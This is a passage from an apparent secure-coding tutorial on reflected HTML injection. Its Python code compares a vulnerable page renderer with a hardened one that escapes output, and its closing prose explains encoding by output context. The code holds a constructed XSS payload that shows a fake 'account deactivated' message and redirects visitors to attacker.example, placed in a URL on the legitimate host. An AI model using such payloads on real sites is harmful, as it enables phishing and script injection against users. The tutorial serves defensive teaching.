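    the quoted attribute additionally needs quotes escaped so it cannot be closed early."""
    name = _name_from(request_url)
    return PAGE_TEMPLATE.format(
        name_text=html.escape(name, quote=False),
        name_attr=html.escape(name, quote=True),
    )


def hostname_check_passes(request_url: str, expected_host: str = LEGITIMATE_HOST) -> bool:
    """The check a cautious user or URL-based anti-phishing filter makes; it passes here."""
    parts = urlsplit(request_url)
    return parts.scheme == "https" and parts.hostname == expected_host


# Constructed payload: the injected HTML claims the account is disabled and redirects
# to the attacker's host, as in the incident described above.
PAYLOAD = (
    "<p>Your account has been deactivated.</p>"
    "<script>location='http://attacker.example/verify'</script>"
)
ATTACK_URL = f"https://{LEGITIMATE_HOST}/update?name=" + quote(PAYLOAD, safe="")
BENIGN_URL = f"https://{LEGITIMATE_HOST}/update?name=alice"

if __name__ == "__main__":
    print("hostname check passes:", hostname_check_passes(ATTACK_URL))
    print("vulnerable page carries script:", "<script>" in render_vulnerable(ATTACK_URL))
    print("hardened page carries script:", "<script>" in render_hardened(ATTACK_URL))
    print(render_hardened(ATTACK_URL))
```

The encoding is chosen by where the value is written, not by what it looks like on input: the same string needs quote escaping inside the attribute but not inside the paragraph, and a value placed into a script block or a URL scheme position would need a different treatment again. That is why a single generic input filter is a weaker guarantee than encoding at each output point.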
Copyright © Lexa Software, 1996-2009.